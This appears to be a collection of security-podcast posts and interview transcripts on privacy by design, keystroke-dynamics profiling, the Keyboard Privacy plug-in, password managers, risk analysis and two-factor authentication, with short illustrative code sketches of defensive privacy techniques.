Data minimization is important, but what do you think about companies that do collect everything with hopes that they might use it in the future?
Dr. Cavoukian
See, what they're asking for, they're asking for trouble, because I can bet you dollars to doughnuts that's gonna come back to bite you. Because, especially with data that you're not clear about what you're gonna do with, you've got data sitting there. What data in identifiable form does is attract hackers. It attracts rogue employees on the inside who will make inappropriate use of the data, sell the data, do something with the data. It just...you're asking for trouble, because keeping data in identifiable form, once the uses have been addressed, just begs trouble. I always tell people, if you wanna keep the data, keep the data, but de-identify it. Strip the personal identifiers, make sure you have the data aggregated, de-identified, encrypted, something that protects it from this kind of rogue activity. And you've been reading lately all about the hackers who are in, I think they were in the IRS for God's sakes, and they're getting in everywhere here in my country. They're getting into so many databases, and it's not only appalling in terms of the data loss, it's embarrassing for the government departments who are supposed to be protecting this data. And it fuels even additional distrust on the part of the public, so I would say to companies, "Do yourself a huge favor. You don't need the data, don't keep it in identifiable form. You can keep it in aggregate form. You can encrypt it. You can do lots of things. Do not keep it in identifiable form where it can be accessed in an unauthorized manner, especially if it's sensitive data." Oh my god, health data...Rogue employees, we have a rash of it here, where...and it's just curiosity, it's ridiculous. The damage is huge, and for patients, and I can tell you, I've been a patient in hospitals many times. The thought that anyone else is accessing my data...it's so personal and so sensitive. So when I speak this way to boards of directors and senior executives, they get it. They don't want the trouble, and I haven't even talked about costs. Once these data breaches happen these days, it's not just lawsuits, they're class action lawsuits that are initiated. It's huge, and then the damage to your reputation, the damage to your brand, can be irreparable.
Cindy Ng
Right. Yeah, I remember Meg Whitman said something about how it takes years and years to build your brand and reputation, and seconds to ruin it.
Dr. Cavoukian
Yeah, yes. That is so true. There's a great book called "The Reputation Economy" by Michael Fertik. He's the CEO of reputation.com. It's fabulous. You'd love it. It's all about exactly how long it takes to build your reputation, how dear it is and how you should cherish it and go to great lengths to protect it.
Cindy Ng
Can you speak about data ownership?
Dr. Cavoukian
You may have custody and control over a lot of data, your customer's data, but you don't own that data. And with that custody and control comes an enormous duty of care. You gotta protect that data, restrict your use of the data to what you've identified to the customer, and then if you wanna use it for additional purposes, then you've gotta go back to the customer and get their consent for secondary uses of the data. Now, that rarely happens, I know that. In Privacy by Design, one of the principles talks about privacy as the default setting. The reason you want privacy to be the default setting...what that means is if a company has privacy as the default setting, it means that they can say to their customers, "We can give you privacy assurance from the get-go. We're collecting your information for this purpose," so they identify the purpose of the data collection. "We're only gonna use it for that purpose, and unless you give us specific consent to use it for additional purposes, the default is we won't be able to use it for anything else." It's a model of positive consent, it gives privacy assurance, and it gives enormous, enormous trust and consumer confidence in terms of companies that do this. I would say to companies, "Do this, because it'll give you a competitive advantage over the other guys."
As you know, because you sent it to me, the Pew Research Center, their latest study on Americans' attitudes, you can see how high the numbers are, in the 90 percents. People have had it. They want control. This is not a single study. There have been multiple surveys that have come out in the last few months like this. Ninety percent of the public, they don't trust the government or businesses or anyone. They feel they don't have control. They want privacy. They don't have it, so you have, ever since, actually, Edward Snowden, you have the highest level of distrust on the part of the public and the lowest levels of consumer confidence. So, how do we change that? So, when I talk to businesses, I say, "You change that by telling your customers you are giving them privacy. They don't even have to ask for it. You are embedding it as the default setting which means it comes part and parcel of the system." They're getting it. I do what I call my neighbors test. I explain these terms to my neighbors who are very bright people, but they're not in the privacy field. So, when I was explaining this to my neighbor across the street, Pat, she said, "You mean, if privacy's the default, I get privacy for free? I don't have to figure out how to ask for it?" And I said, "Yes." She said, "That's what I want. Sign me up!"
See, people want to be given privacy assurance without having to go to the lengths they have to go to now to find the privacy policy, search through the terms of service, find the checkout box. I mean, it's so full of legalese. It's impossible for people to do this. They wanna be given privacy assurance as the default. That's your biggest bet if you're a private-sector company. You will gain such a competitive advantage. You will build the trust of your customers, and you will have enormous loyalty, and you will attract new opportunity.
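As a rough illustration of what "privacy as the default setting" can mean at the implementation level, here is a minimal sketch. It is our example, not anything Dr. Cavoukian specifies: every secondary use starts out disabled, and nothing flips on without an explicit, recorded opt-in. The field names are illustrative.

```typescript
// Sketch: "privacy as the default setting" expressed as data. All secondary
// uses start disabled; only an explicit, recorded opt-in can enable one.
// Field names are illustrative, not from any real system.
interface ConsentRecord {
  purpose: "analytics" | "marketing" | "research";
  grantedAt: Date;
}

interface CustomerPrivacySettings {
  primaryPurpose: string;          // the use the data was collected for
  secondaryUses: ConsentRecord[];  // empty by default: no consent, no use
}

function newCustomerSettings(primaryPurpose: string): CustomerPrivacySettings {
  // Privacy by default: the customer never has to hunt for an opt-out box.
  return { primaryPurpose, secondaryUses: [] };
}

function grantConsent(
  settings: CustomerPrivacySettings,
  purpose: ConsentRecord["purpose"]
): CustomerPrivacySettings {
  // Positive consent: an explicit action, recorded with a timestamp.
  return {
    ...settings,
    secondaryUses: [...settings.secondaryUses, { purpose, grantedAt: new Date() }],
  };
}

function mayUseFor(
  settings: CustomerPrivacySettings,
  purpose: ConsentRecord["purpose"]
): boolean {
  return settings.secondaryUses.some((c) => c.purpose === purpose);
}
```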
Cindy Ng
What are your Privacy by Design recommendations for wearables and IoT innovators and developers?
Dr. Cavoukian
The internet of things, wearable devices and new app developers and start up...they are clueless about privacy, and I'm not trying to be disrespectful. They're working hard, say an app developer, they're working hard to build their app. They're focused on the app. That's all they're thinking about, how to deliver what the app's supposed to deliver on. And then you say, "What about privacy?" And they say, "Oh, don't worry about it. We've got it taken care of. You know, the third-party security vendor's gonna do it. We got that covered." They don't have it covered, and what they don't realize is they don't know they don't have it covered. "Give it to the security guys and they're gonna take care of it," and that's the problem. When I speak to app developers...I was at Tim O'Reilly's Web 2.0 last year or the year before, and there's 800 people in the room, I was talking about Privacy by Design, and I said, "Look, do yourself a favor. Build in privacy. Right now you're just starting your app developing, build it in right now at the front end, and then you're gonna be golden. This is the time to do it, and it's easy if you do it up front." I had dozens of people come up to me afterwards because they didn't even know they were supposed to. It had never appeared on their radar. It's not resistance to it. They hadn't thought of it. So our biggest job is educating, especially the young people, the app developers, the brilliant minds. My experience, it's not that they resist the messaging, they haven't been exposed to the messaging. Oh, I should just tell you, we started Privacy by Design certification. We've partnered with Deloitte and I’ll send you the link and we're, Ryerson University, where I am housed, we are offering this certification for Privacy by Design. But my assessment arm, my audit arm, my partner, is Deloitte, and we're partnering together, and we've had a real, real, just a deluge of interest.
Cindy Ng
So, do you think that's also why people are also hiring Chief Privacy Officers?
Dr. Cavoukian
Yes.
Cindy Ng
What are some qualities that are required in a Chief Privacy Officer? Is it just a law background?
Dr. Cavoukian
No, in fact, I'm gonna say the opposite, and this is gonna sound like heresy to most people. I love lawyers. Some of my best friends are lawyers. Don't just restrict your hiring of Chief Privacy Officers to lawyers. The problem with hiring a lawyer is they're understandably going to bring a legal regulatory compliance approach to it, which, of course, you want that covered. I'm not saying...You have to be in compliance with whatever legislation is in your jurisdiction. But if that's all you do, it's not enough. I want you to go farther. When I ask you to do Privacy by Design, it's all about raising the bar. Doing technical measures such as embedding privacy into the design that you're offering into the data architecture, embedding privacy as a default setting. That's not a legalistic term. It's a policy term. It's computer science. It's a... You need a much broader skill set than law alone. So, for example, I'm not a lawyer, and I managed to be Commissioner for three terms. And I certainly valued my legal department, but I didn't rely on it exclusively. I always went farther, and if you're a lawyer, the tendency is just to stick to the law. I want you to do more than that. You have to have an understanding of computer science, technology, encryption, how can you... De-identification protocols are critical, combined with the risk of re-identification framework. When you look at the big data world, the internet of things, they're going to do amazing things with data. Let's make sure it's strongly de-identified and resist re-identification attacks.
Cindy Ng
There have been reports that people can re-identify individuals from anonymized data.
Dr. Cavoukian
That's right, but if you examine those reports carefully, Cindy, a lot of them are based on studies where the initial de-identification was very weak. They didn't use strong de-identification protocols. So, like anything, if you start with bad encryption, you're gonna have easy decryption. So, it's all about doing it properly at the outset using proper standards. There's now four standards of de-identification that have all come out that are risk-based, and they're excellent.
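Dr. Cavoukian doesn't name the four standards here, but one common building block in risk-based de-identification is k-anonymity: every combination of quasi-identifiers must be shared by at least k records. Below is a minimal sketch of that check; the field names, sample data, and threshold are illustrative and not taken from any specific standard.

```typescript
// Sketch: checking k-anonymity over a set of quasi-identifier columns.
// A release is k-anonymous if every quasi-identifier combination appears
// in at least k records, so no one can be singled out by those fields alone.
type Row = Record<string, string | number>;

function isKAnonymous(rows: Row[], quasiIdentifiers: string[], k: number): boolean {
  const counts = new Map<string, number>();
  for (const row of rows) {
    const key = quasiIdentifiers.map((q) => String(row[q])).join("|");
    counts.set(key, (counts.get(key) ?? 0) + 1);
  }
  return [...counts.values()].every((n) => n >= k);
}

// Example: generalizing birth year to a decade and zip code to three digits
// is the kind of step used to push a dataset over the k threshold.
const release: Row[] = [
  { birthDecade: "1960s", zip3: "997", diagnosis: "hypertension" },
  { birthDecade: "1960s", zip3: "997", diagnosis: "asthma" },
];
console.log(isKAnonymous(release, ["birthDecade", "zip3"], 2)); // true
```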
Cindy Ng
Are you a fan of possibly replacing privacy policies with something simpler, like a nutrition label?
Dr. Cavoukian
It's a very clever idea. They have tried to do that in the past. It's hard to do, and I think your simplest one for doing the nutrition kinda label would be if you did embed privacy as the default setting. Because then you could have a nutrition label that said, "Privacy built in." You know how, I think, Intel had something years ago where you had security built in or something. You could say, "Privacy embedded in the system."
Over the past few weeks, we started seeing a few new security trends that we think haven’t yet had their defining moment and that we’ll likely see more of next year. We reflected on the predictions we made last year and shared our annual cybersecurity predictions for 2017.
Meanwhile, the Inside Out Security Show panel – Kilian Englert, Forrest Temple, and Mike Buckbee – also speculated on a few things of their own based on a few articles they’ve read in the news recently – hackers guessing your credit card information in less than six seconds, the security implications of the Amazon Go grocery store, and more malvertising. Plus, we also continued our never-ending debate on privacy.
But what the panelists couldn’t get enough of were the allegations that Russia attempted to affect the outcome of the US presidential election. No, we didn’t discuss the politics of what happened, but they did share teachable moments we can all learn from.
To start – we’ve all heard of scams where the IRS or FBI call about identity theft or about our taxes. But what happens when the real FBI is really calling? If there isn’t a process in place for every little detail that happens, then we’re left vulnerable.
“My first step would be to see if it’s really the FBI calling. Because there are so many weird scams around stuff like that,” advises Mike Buckbee.
Kilian Englert supplemented Mike’s advice with this suggestion: “If you look at some of the standards that come out, like the NIST standards. A lot of them recommend having some type of plan in place…some plan, any plan.”
And don’t be deterred because Forrest Temple reminds us, “You don’t see the successes; you only see the failures… That’s how data security is. Maybe there are a million successes for every failure, you just don’t know.”
Click play to hear the rest of the show and why Kilian isn’t a fan of Barcelona Football. There’s a point! We promise!
I recently came across a tweet that was shared during the Infosecurity Magazine Conference in Boston, “Security is a benefit, but not always a feature.” Why? You can spend a lot of money and still be hacked or not spend a dime and not be hacked.
How did the Inside Out Security Show panel react? Here's what Mike Buckbee, Kilian Englert and Alan Cizenski had to say:
Buckbee: It’s all tradeoffs. It’s all a bet. If you go into a casino, you’re putting money down… While it’s true you can spend a lot of money and still get hacked, it’s less likely than if you spend nothing. Or not even so much spend, in terms of money, but in terms of effort. You spend the effort and time to make secure systems… so you’re trying to play the odds.
Englert: We can write it up as a truism… We’ve never been hacked before, so we must be secure. That’s the default security mindset, which is at odds with the truth… The best security in the world only takes you so far.
Cizenski: When you’re spending money on security tools, at that point, at the very least, you’re gonna have an audit trail or something to look back at so you can say, “How did that happen?” Instead of just thinking, “We’ve never been hacked. We’re good.”…When it does happen, you can’t really do much about it [if you don’t have an audit trail].
Click play to learn more!
Additional comments include:
• A rogue admin who took down a former employer’s network
• Admins who experience burnout
• NIST’s announced guidance on SMS for two-factor authentication
• Whether or not security problems are the user’s fault
• As well as the latest research report on security shortcomings in a heart device
Based in Norway, Per Thorsheim is an independent security adviser for governments as well as organizations worldwide. He is also the founder of PasswordsCon.org, an annual conference that’s all about passwords, PIN codes, and authentication. Launched in 2010, the conference invites security professionals & academic researchers to better understand and improve security.
In part one of our discussion with Per, we examined two well-known forms of authentication – passwords and hardware. In this segment, he talks about a lesser-known form – biometrics – and the use of keystroke dynamics to identify individuals.
Per explains, “Keystroke dynamics, researchers have been looking at this for many, many years. It’s still an evolving piece of science. But it’s being used in real life scenarios with banks. I know at least there’s one online training company in the US that’s already using keystroke dynamics to verify if the correct person is doing the online exam. What they do is measure how you type on a keyboard. And they measure the time between every single keystroke, when you are writing in password or a given sentence. And they also look for how long you keep a button pressed and a few other parameters.”
What’s even more surprising is that it is possible to identify one’s gender using keystroke dynamics. Per says, “With 7, 8, 9 keystrokes, they would have a certainty in the area of 70% or more…and the more you type, if you go up to 10, 11, 12, 15 characters, they would have even more data to figure out if you were male or female.”
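A rough sketch of the two timing features Per describes may help: dwell time (how long a key is held down) and flight time (the gap between one keystroke and the next). The event shape below is an assumption for illustration, not taken from any real keystroke-dynamics product.

```typescript
// Sketch: extracting the timing features used in keystroke dynamics.
// The event format is illustrative; real systems capture keydown/keyup
// timestamps in the browser or at the OS level.
interface KeyEvent {
  key: string;
  downAt: number; // ms timestamp of keydown
  upAt: number;   // ms timestamp of keyup
}

function keystrokeFeatures(events: KeyEvent[]) {
  // Dwell time: how long each key is held down.
  const dwell = events.map((e) => e.upAt - e.downAt);
  // Flight time: gap between releasing one key and pressing the next.
  const flight = events.slice(1).map((e, i) => e.downAt - events[i].upAt);
  return { dwell, flight };
}

// A profile is typically built from averages and variances of these values
// over many samples; as Per notes, even a handful of keystrokes is enough
// for a coarse guess such as male versus female.
```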
Those who don’t want to be profiled by their typing gait can try the Keyboard Privacy extension from Per Thorsheim and fellow infosec expert Paul Moore.
Per Thorsheim: Keystroke dynamics... There have been researchers looking into this for many, many years already. But still, it's really an evolving piece of science. But it is also being used today in real-life scenarios with banks. I know that there is at least one online training company in the U.S. who is already using keystroke dynamics to verify if the correct person is actually doing the online exam, as an example. What they do is they measure how you type on your keyboard and they measure the time between every single keystroke when you're writing in a password or a given sentence. They also look out for how long you keep each button depressed and a few other parameters.
Now, this sounds weird, I know. But I learned from researchers in France, they have been collecting this kind of data from a lot of men and women, and talk about men and women being different in many different areas. But I had never guessed. I would have never believed until they told me that men and women in general type differently on a keyboard, using normal standard 10 finger touch type on a keyboard. They said that as soon as you have entered seven, eight, nine characters onto a keyboard, we can with a pretty good probability tell you if it is a man or a woman typing on the keyboard. That is again assuming typing normally with 10 fingers touch type on a keyboard.
Cindy Ng: What is the accuracy rate of the gender identification?
Per Thorsheim: The accuracy that they talked about is they would say that with seven, eight, nine keystrokes, they would have a certainty on this in the area of 70% or more. So, of course, it's not that good, but it's improving. And the more you type if you go up to 10, 12, 15 characters, they would have even more data to figure out whether you're a male or female. But that's just figuring out male or female. It doesn't identify you as a unique human being on planet earth. Because in that setting, this technology is nowhere near good enough. There are lots of people that would actually type just like you on a keyboard, in the world.
Cindy Ng: What's the probability of you typing in the same way as other people in our population?
Per Thorsheim: If you have an iPhone and you're using Touch ID with your iPhone or maybe an iPad today, the fingerprint reader that is being used by Apple today, they usually say that those devices have what we call a false acceptance rate or false rejection rate of 1 in 50,000. Meaning that 1 in 50,000 attempts, where you try to identify to your own phone will fail even if you're using the correct finger. The other way around 1 in 50,000 people, it means that person among 50,001 will have a fingerprint that will be accepted as you. But it's not you getting in.
So false acceptance rate, 1 to 50,000. With the keystroke dynamics, the last time I heard was 1 in 100. So they're saying that if you're in a room with 200 people, there will be 1, maybe even 2 people in there that would be able to type on the keyboard almost the same way as you do. Then they would be able to be identified as being Cindy, but it's not. It's them typing on a keyboard.
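Per's room-of-200 figure is just the false acceptance rate multiplied by the number of other people present; a quick back-of-the-envelope check using the rates he quotes:

```typescript
// Expected number of other people whose biometric sample would be accepted
// as yours, given a false acceptance rate (FAR) and a population size.
const expectedFalseMatches = (far: number, population: number): number =>
  far * population;

console.log(expectedFalseMatches(1 / 50000, 200)); // fingerprint-style FAR: 0.004 people
console.log(expectedFalseMatches(1 / 100, 200));   // keystroke dynamics FAR: 2 people
```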
Cindy Ng: What's the potential abuse when we're using keystroke dynamics?
Per Thorsheim: The frustration is from the privacy perspective of this. A very simple example that I have been using, which is maybe chauvinistic as well as being male is, say that you go to an online store and you want to purchase a vacuum cleaner and you have never been there before. You don't have an account, nothing. In the search field, you type in vacuum cleaner. Based on that and nothing else, you have already given them so many keystrokes that they can identify whether you are male or female.
So if you are male or when they assume you are male based on how you type, they will give you the 3000 watts, black, shiny, Porsche model vacuum cleaner which is big and makes a lot of noise and it can run by itself. If they identify you as being female, maybe they think that you prefer the low noise, nice colored, red colored vacuum cleaner that doesn't take up a lot of space when it's not being used. That's a very simple example.
But from a privacy perspective, this can be used for tracking you across multiple sources. They can identify you as a returning customer. They can also use it to check if you are, say, allowing your kids or your husband or your girlfriend to log in to your accounts. They may be able to use that for fraud detection to say that this is the wrong person logging in. That can be a good feature to have. It can also be abused in ways that will affect your privacy or your right to privacy.
Cindy Ng: All the different types of authentication: passwords, hardware, biometrics. It all culminates in behavioral profiling, which is a hallmark worry for many. You and another security expert, Paul Moore, created Keyboard Privacy. It's supposed to reduce the accuracy of profiling your typing gait from 82% to 3%. I read this in an article. Can you tell us a little bit more about Keyboard Privacy?
Per Thorsheim: We learned about this keystroke dynamics being used with several banks here in Norway, where I live. We learned about this because we received information from people who told us that, "Did you actually know the banks are using keystroke dynamics?" We said, "No." We didn't know that. But we figured out that it is being used. We looked at the source code of web pages where we log in and we saw that they're actually using keystroke dynamics. They are using keystroke dynamics as a sort of fraud prevention. They want to make sure that the correct person is logging into their own account and not somebody else. That's a good purpose.
What we reacted to was the fact that they didn't tell us, that they had suddenly started to build these biometric profiles, the keystroke dynamics profile of every single user that is using online banking here in Norway. Also, a couple of banks in the UK as well are doing this. So we had an evening, me and Paul, and we were talking to each other and like privacy counsels, blah blah blah, security usability, blah blah blah. But then we just said, just for the fun of it: How can we break this? How can we prevent them from being able to recognize if it is me or Paul or anybody else logging into my accounts?
Say we would like to do that, prevent that tracking from being able to identify us as being male or female. So we looked at the code and we realized, well, they are looking at a very low number of parameters, two, three, four different parameters. One of them being the amount of time between each key press, and another being how long you keep each key depressed on your keyboard. The plug-in for Google Chrome that Paul created, based on my idea, takes all your keystrokes from your keyboard, and before they enter any form on the page you're visiting, it puts in a random time delay between each keystroke, and that random time delay will be anything from zero milliseconds to 50 milliseconds.
To the human eye, even if you type really fast, that delay is so small that you won't be able to notice on screen. But for anyone using keystroke dynamics, this will completely destroy their capability of building a profile on how you type, and it will also destroy their ability to detect whether it is you or anyone else logging into a specific account.
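The extension's actual source isn't reproduced here; the following is only a rough sketch of the mechanism Per describes, written as a browser content script. The names, event handling, and re-insertion logic are our assumptions for illustration, not Paul Moore's code.

```typescript
// Rough sketch of the idea behind the Keyboard Privacy plug-in: swallow each
// printable keystroke and replay it into the field after a random 0-50 ms
// delay, so scripts measuring inter-key timing see jitter instead of your
// typing rhythm. Illustrative only; a real extension also has to handle
// textareas, synthetic key events, per-site exceptions, and so on.
const MAX_JITTER_MS = 50;

document.addEventListener(
  "keydown",
  (event: KeyboardEvent) => {
    const target = event.target;
    // Only intercept ordinary printable characters typed into text inputs.
    if (!(target instanceof HTMLInputElement) || event.key.length !== 1) return;

    event.preventDefault();            // the original keystroke never reaches the field
    event.stopImmediatePropagation();  // ...or the page's own timing-hungry listeners

    const delay = Math.random() * MAX_JITTER_MS;
    setTimeout(() => {
      // Re-insert the character at the cursor position after the random delay.
      const start = target.selectionStart ?? target.value.length;
      const end = target.selectionEnd ?? start;
      target.value = target.value.slice(0, start) + event.key + target.value.slice(end);
      target.setSelectionRange(start + 1, start + 1);
      target.dispatchEvent(new Event("input", { bubbles: true }));
    }, delay);
  },
  true // capture phase, so this runs before the page's handlers
);
```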
Cindy Ng: There is a warning before you install it. It says it can read and change all your data on websites you visit. I was wondering if you can expand on that warning. Do you store the data that you're changing?
Per Thorsheim: For those who are interested in programming and can read code, you can read the code for this plug-in; it's pretty simple and short. The only thing we do is insert this random time delay between your keystrokes. We also have an option to turn it off for specific websites. If you use that option, of course, that information will be stored locally on your computer. Say that for bank X or website Y, we have stored information on your computer saying that the plug-in shouldn't be used for that website. You want to be yourself, so to speak.
The thing with these plug-ins is that since the plug-in is receiving whatever you type on your keyboard and does something to that data before putting it into a website, it would be fully possible for us, just like anybody else developing plug-ins, to record everything you type on your keyboard and, as an example, send it off to us or to your favorite three-letter agency somewhere in the world.
Cindy Ng: Your password conference is really interesting. It's the one and only conference on passwords. Tell us a little bit more about that.
Per Thorsheim: I'm the founder of and running PasswordsCon, which is the world's first and, as far as I know, only conference in the world that is only about passwords and digital authentication. It's a conference that I started in 2010, with support from the University of Bergen in Norway, where I live. It's two and a half days with geeky people from all over the world, academics and security professionals and password hackers if you like, discussing how to break passwords, how to secure them, how to transmit them, how to store them, how not to store them of course, all kinds of science and real-world experience in handling passwords from every imaginable perspective.
I can tell you, I know, you don't have to say it: it sounds very nerdy, and a lot of people do ask me why this insane interest in passwords. But I can also tell you that almost everyone who has participated in this conference for the first time, when I ask them afterward the obvious question, "What did you think of the conference?", has responded by saying, "Wow! I had never thought that a topic like passwords, which I consider to be such an insignificant and very small part of my everyday life and security, could actually be expanded into so many topics like statistics, cryptography, linguistics, math, psychology, colors, sounds, and everything."
So people have been really, really fascinated when they have participated in this conference. Lots of people have also gained new ideas from the research and taken them back to their own organizations to implement.
Cindy Ng: I think what people are saying now is that security and technology are becoming so seamless that it's almost like a utility, where you just plug and play, which has its own problems, as the Mirai botnet attack showed.
Per Thorsheim: Yeah.
Cindy Ng: With the default password problems. So I would equate passwords with electricity: a hugely important utility that people need to understand, to synthesize, to work on together, to figure out. We often tend to innovate and create as fast as possible without security and privacy from the start. So it's a great thing for everyone, and I applaud you for doing that.
Per Thorsheim: Yeah. Thank you. I am concerned about the internet of things, as we say, and the Mirai botnet really showed us, it gave us not one but several lessons on the security, or insecurity, of the internet of things and all kinds of connected devices. It's interesting to see that the major attack vector was security cameras, DVRs, all kinds of equipment that was connected to the internet, running with default usernames and passwords and available online. So just by doing an internet-wide scan, you will find hundreds of thousands of such devices connected, and you can easily break into them and use them for illegal purposes, which we saw with the Mirai botnet.
Cindy Ng: Oftentimes the password is set to a default, with the assumption that the user will go back and change it. But that's not the case. It's also a good segue to hear from a password expert and security adviser: what are your password secrets that you can share?
Per Thorsheim: I will draw a line between whether you are tech savvy and using computers. Or if you're like my own mother, who doesn't take an interest at all. I have to draw a line there. First of all, if you're like my own mother and you're not really interested in learning how to use computers and most technology, you're just one of those that you just want it to work. The best advice I can give you is to write down your passwords on a piece of paper or in a small notebook and keep it in your kitchen drawer or somewhere at home, where it is reasonably safe. In that, you will put down the passwords or the pass phrases that you use for different sites and services on the internet.
Most of those passwords, you don't have to remember them. You don't need to use them every day. An important part is that, and I'm sorry to say this, you have to try to use unique passwords for the different services that you're using online. Because we know that as soon as the bad guys are able to get access to your password for one site or one service, they will very quickly try the same username and password across other services to gain access to more accounts, more money, more information, more data that they can use and abuse about you, or sell to spammers and the like online. So write down and use unique passwords. That's my advice for my mother.
If you're tech savvy, if you have used and are using computers, I highly recommend using a piece of software called a password manager. There are many out there; some of them are not as good, either from a security or a usability perspective, but there are some that are really good at both. Some of them are even free, and I highly recommend using them. They will generate passwords for you. They will remember them for you. They will automatically input them into the username and password fields and help you log in. And the only password you really have to remember is the master password for your password manager. That's the one password you can never forget.
Cindy Ng: What if your password manager has a breach? Do you have another layer of security just in case that happens?
Per Thorsheim: There are different kinds of password managers for that. Some of them will store your data in a cloud service, like LastPass, while other password managers, like 1Password, will only store your data locally. So the only way it can be breached would be if somebody got access to your physical computer or phone. If that happens, you have a more serious problem than just the password manager and the accounts stored in it.
The cloud-based password managers also encrypt all your data locally. Only then is the encrypted data transferred to the cloud service. So if the cloud service, the password manager service, is compromised, the attackers will only get access to encrypted data, and they don't have access to the keys stored on your computer or on your phone to unlock that data. So those are actually very safe to use.
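As a rough illustration of that client-side pattern, here is a minimal sketch assuming a PBKDF2-derived key and Fernet symmetric encryption (it is not any vendor's actual implementation, and it requires the third-party `cryptography` package):

```python
import base64
import hashlib
import os

from cryptography.fernet import Fernet

def vault_key(master_password: str, salt: bytes) -> bytes:
    """Derive an encryption key from the master password on the local device."""
    raw = hashlib.pbkdf2_hmac("sha256", master_password.encode(), salt, 600_000)
    return base64.urlsafe_b64encode(raw)  # Fernet expects a urlsafe-base64 32-byte key

salt = os.urandom(16)
key = vault_key("correct horse battery staple", salt)

# Encrypt the vault locally; only this ciphertext is synced to the cloud.
ciphertext = Fernet(key).encrypt(b'{"example.com": "hunter2"}')

# A breach of the sync service exposes only ciphertext. Decryption requires
# the master password (and salt), which stay on the user's own devices.
plaintext = Fernet(key).decrypt(ciphertext)
print(plaintext)
```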
Cindy Ng: It sounds like the hidden message, too, is to do a risk analysis on yourself. Guide us…
Per Thorsheim: Yeah.
Cindy Ng: What are your recommendations for that?
Per Thorsheim: The risk analysis is from an incredibly simple perspective. I'm asking people to write down this stuff: who do you think your enemies are? In most cases the National Security Agency of the U.S. or the FSB in Russia are not your enemies. They have no interest in your life or your data whatsoever if you're just a normal citizen, like most of us are. If you're a five-star general in the army, or if you're working in the intelligence service of some country, then obviously other nation states have an interest in getting access to your data and whatever you do, and then the risk perspective is very different. But in most cases, the biggest risk for you as a normal citizen in most countries will be you yourself losing your passwords, or random computer viruses that are not targeted at you getting access to your Facebook account or your bank account and stealing your money.
So the risk analysis is simple. Make a list of who your enemies are, and for each of those different enemies, try to look at what the probability is of them actually being able to get access to your data, your usernames, and your passwords. If you have them on paper at home, they would have to come to wherever you live and break into your house. The probability of that happening is close to none. Nobody would be interested in going to Norway and breaking into my apartment, as an example.
Cindy Ng: Who or what would be the enemy of an organization or business?
Per Thorsheim: First of all, I would say competitors, of course. Competitors could be interested in trying to gain access to sensitive information that you have about new and upcoming products being researched and developed in your company. You also have to think about the opportunistic hacker, who just wants to make money in some way or another. It could be by giving you a cryptolocker, a virus that will encrypt the data files that you have on your computer. They don't care about what kind of data gets encrypted, and then the bad guys will say, "Hey, this is ransomware," as we call it. "So you have to pay us a certain amount of money for us to give you the password needed to decrypt your files again."
That's a very realistic threat to organizations and companies today, that you need to look into as well. So competitors and random bad guys, just trying to make some quick money. Those are I would say the most important threats to an organization today.
Cindy Ng: Thank you so much, Per.
Last month, there was a thought-provoking article on programmers who were asked to do unethical work on the job. We often talk about balancing security with precaution and paranoia, but I wondered about the balance of ethics and execution.
As always, I was curious to hear the reactions from the Inside Out Security Show panel – Mike Buckbee, Kris Keyser, and Mike Thompson.
Here’s what they had to say:
Thompson: “The downside in technology is that shortcuts lead to lapses in security…In healthcare, there are tight regulations…but who is making that decision in the technology industry?”
Buckbee: “We talk about different kinds of crime like property crime, violent crime, and white collar crime. There’s cybercrime as well. People have different acceptable models in these different areas. [For instance] when it comes to SQL injection, you probably don’t think that adding a few additional characters to a URL is felony criminal trespass, but it totally could be…”
Keyser: “I drew a parallel between engineers who work in the physical space and engineers who work in the digital space. If an engineer or somebody builds a faulty house with a poor structure or a horrible locking system, there would be repercussions for that if the house collapsed…I don’t think people have realized the parallels between that and the digital space.”
Click play to hear what else they had to say! Additional responses include thoughtful insights into the recent San Francisco MUNI hacker who got hacked himself, potentially unnecessary malware fixes, as well as the latest hacking tools and exploits.
Based in Norway, Per Thorsheim is an independent security adviser for organizations and government. He is also the founder of PasswordsCon.org, a conference that’s all about passwords, PIN codes, and authentication. Launched in 2010, the conference gathers security professionals and academic researchers from around the world to better understand and improve security.
In part one of our conversation, Per explains - despite the risks - why we continue to use passwords, the difference between 2-factor authentication and 2-step verification, as well as the pros and cons of using OAuth.
Naturally, the issue of privacy comes up when we discuss connected accounts with OAuth. So we also made time to cover Privacy by Design as well as the upcoming EU General Data Protection Regulation (GDPR).
Cindy Ng
Recently, I had the pleasure to speak with an independent security advisor, Per Thorsheim, on all things passwords.
Based in Norway, he is the founder of PasswordsCon, the world's first and only conference about passwords. It's a gathering of security professionals and academic researchers from all around the world, where they discuss ways to improve security worldwide. Thank you, Per. Let's get started.
So, a very important question: lots of security experts have warned us about the dangers of passwords, but why do we continue to use them?
Per Thorsheim
Well, it's cheap to use from a business perspective. There are many cases where we don't have a business situation where, you know, there's no point in using anything else than passwords. They are available in every single system we use, and if you want something else, it's going to be more expensive. And who's going to pay for that?
Cindy Ng
A lot of people are using password managers to manage all our different accounts for all our different sites. And there’s also two-factor authentication which can be tiresome. You suggested that there's life after two-factor authentication. Can you tell us a little bit more about that?
Per Thorsheim
Yeah, you know, we have National Security Awareness Month here in Norway, just like in the US, all of October. And a very important message that we have been bringing out in all possible channels over the past month is to use two-factor authentication. Basically what that is, is that in addition to having a username and password, you would have a code that you need to enter, which you get from a key fob, a text message, or something similar. Maybe you have a couple of codes written down on a piece of paper that you have to type in, in addition to your password. That's two-factor authentication.
Now, what I mean about life after two-factor authentication is that every step that we add into the process of authenticating, you know, how to figure out that you are the correct person logging into our system, takes time. And by adding a second factor, it will take you, in most cases, a little bit extra time to be able to log in. For some people, that's okay. For some people, it's a disruption. It's annoying, and what I've been thinking about, you know, by saying, "life after two-factor authentication," is, "What happens today when, in my case, I have, like, 400 accounts on different services all over the internet and at home and at different, you know, banks and insurance companies and so on? What happens today that I'm actually using two-factor authentication with all of those accounts?"
I'm just imagining to myself that that's going to be very annoying. It's going to take a lot of time. Every time I have to log in to any kind of service, I have to type in username, I have to type in my password or pass phrase, and then I also have to look at my phone to receive a text message or find you know, that dumb piece of hardware dongle that I forgot at home, probably, and type in a code from that one as well. So from a usability perspective, I'm a little bit concerned, maybe even a little worried about what's the world going to be in a couple years when all the services that I'm using today are either offering or even requiring me to use two-factor authentication?
Now, from a security perspective, adding this kind of two-factor authentication's a good thing. It increases security in such a way that in some cases, even if I told you my password for my Facebook account, as an example, well, I have two-factor authentication. You won't be able to log in, because as soon as you type in my username and password, I will be receiving a code via SMS from Facebook on my phone, which you don't have access to. Now, without that code, you will not be able to log in to my account. The security perspective of this is really good which is why we recommend it. From the usability side, I'm a little bit concerned about the future.
Cindy Ng
